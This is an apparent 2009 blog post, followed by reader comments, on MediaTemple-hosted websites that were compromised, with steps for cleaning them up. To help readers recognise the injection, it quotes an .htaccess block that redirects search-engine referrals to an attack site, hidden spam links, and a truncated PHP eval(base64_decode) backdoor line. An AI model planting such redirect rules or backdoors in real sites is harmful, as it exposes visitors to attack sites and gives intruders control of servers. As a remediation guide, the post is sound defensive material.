MediaTemple hacked, and how to fix it

November 19th, 2009 • 9

Update: MediaTemple has finally acknowledged the issue here.

Yesterday a client of mine emailed me with a peculiar problem – all links to his website were automatically redirecting users to allvideo.org.uk, which Firefox warns is an attack site. Checking the source code of his website also revealed a large number of spam links to various porn sites in the footer, all of which were hidden using in-line CSS.

At first I thought his WordPress installation was a victim of the security hole that was exposed and exploited a few weeks ago, but some quick checks revealed that this wasn’t the issue.

After doing some research on Google, it turns out that this wasn’t a WordPress problem at all – it was a MediaTemple problem. Joomla, Drupal, WordPress and even static, flat HTML files were all being affected. According to various sources, MT is aware of the problem and is working on it, even though they haven’t contacted customers to tell them anything at all.

I find it extremely disconcerting that this is the approach they have taken even though it seems that a large number of GridServer accounts have been compromised, and it is likely that some customers aren’t even aware of it.

How I cleaned up the site

  • The redirection to the website was being caused by entries in the .htaccess file, located in the root of the website’s folder. Log into your website using FTP and open the .htaccess file and look for something like the following:
    RewriteEngine On
    RewriteOptions inherit
    RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
    RewriteRule .* http://allvideo.org.uk/in.cgi?4&parameter=sf [R,L]
    

    Simply delete these lines and links to your website should work correctly again.

  • Check the index.php file located in the root of your folder to see if it contains the following code at the bottom:

    < font style="position: absolute;overflow: hidden;height: 0;width: 0">
    < a href="http://www.bangpass.com/t1/pps=brunette/assparade.html">assparade < ?php eval(base64_decode("JGw9Imh0dHA6Ly90b3Vycm[truncated]")); ?>

    Delete these lines.

  • Again using an FTP client, go into the /wordpress/wp-content/plugins/akismet folder and check for a file named akismet_log.php. This file is a trojan named PHP.RSTBackdoor, which according to Symantec, is written in PHP and only runs on HTTP servers with PHP installed. Again, just delete the file.
  • Immediately change your FTP, WordPress and MediaTemple passwords.

If you’re very concerned, or if other issues pop up, the best thing to do would be to manually reinstall WordPress. Simply back up the uploads directory and your theme and keep a record of all the plugins so that you can restore the folders and reinstall the plugins after uploading a fresh copy of the wordpress folder.

This post isn’t aimed at taking a low blow at MediaTemple. They offer a pretty good service, even though there are some issues such as the fact that they’re still running PHP v4. And no, having PHP v5 in a beta program that I’m not included in doesn’t help at all. I just think that they could be handling this situation much better and at the very least alerting their customers so that they can keep an eye on their sites.

Filed under Tutorial.

Follow me on twitter and subscribe to the RSS feed.

9 Responses to “MediaTemple hacked, and how to fix it”

  1. Matthew Hunt November 21st, 2009 at 2:25 pm

    A client of mine last week was also hacked. The exact same way. And guess who his hosting provider was? You guess it, Media Temple. ‘even though they haven’t contacted customers to tell them anything at all. ” You got that right. I’m lucky I don’t use Media Temple and no other clients of mine do either. “even static, flat HTML files were all being affected. ” I can confirm that as well. I had to correct 10 websites. It was a long night.

  2. tony November 21st, 2009 at 2:30 pm

    Yes it’s really disappointing that it was handled this way, I really can’t figure out why they haven’t alerted their customers. I’m sure some of them are affected right now and aren’t even aware of it.

    Thanks for commenting.

  3. Lisa November 29th, 2009 at 10:39 am

    I actually got emails from MT regarding the problem but it didn’t come close to explaining what was going on and how serious. Pretty much this:
    “This is an automated notice informing you that our system has reset your Server Administrator FTP/SSH password due to suspicious activity observed on your (gs) Grid-Service. Our systems have taken measures to protect your service from any possible future exploits.”
    Another reason to move away from them since I have more trouble with MT than any other hosting firm.

  4. Tony November 29th, 2009 at 11:14 am

    I just got that email myself a few days ago and I had to go change my passwords. Really don’t know why they seem to be shooting themselves in the foot.

    Maybe sometime we’ll get the full story.

  5. Peter Hobley February 12th, 2010 at 1:48 am

    Phew, thanks for this. I had a Drupal site go down in mysterious circumstances – just got a blank white screen. Replaced my index.php file and it worked yet the links were being directed to allvideo. Found your explanation and it makes sense – I’m guessing the code in the index file screwed up the Drupal system so it totally broke. That was fortunate because it meant nobody could get redirected by the dodgy .htaccess file.

    Thanks again. Will be changing up all passwords.

  6. Drupal website hacked – hosted by Heart Internet February 12th, 2010 at 2:15 am

    [...] if you didn’t already know: Google is your friend. It was mine too as a search produced this post by Tony Geer that explained everything. Reading it I discovered that sure enough, my .htaccess file had been [...]

  7. tony February 12th, 2010 at 7:48 am

    Glad to be of help Peter!

  8. JHaslam May 14th, 2010 at 12:07 pm

    We had this happen to us as well. We couldn’t see the files you mentioned, but our .htaccess file had been hacked. Hopefully we have this fixed by changing user names and passwords for the access to our files. If not, then it is time to move elsewhere.

  9. tony May 14th, 2010 at 12:14 pm

    You may be aware, but one of the things MT did to try and mitigate the problem was to reset the database passwords for all of their users, unless they had been reset manually.

Subscribe to RSS Feed

RSS feed